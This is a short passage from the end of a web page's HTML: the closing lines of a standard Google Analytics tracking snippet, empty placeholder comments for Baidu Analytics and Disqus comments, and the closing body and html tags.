        ga('create', 'UA-141810677-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
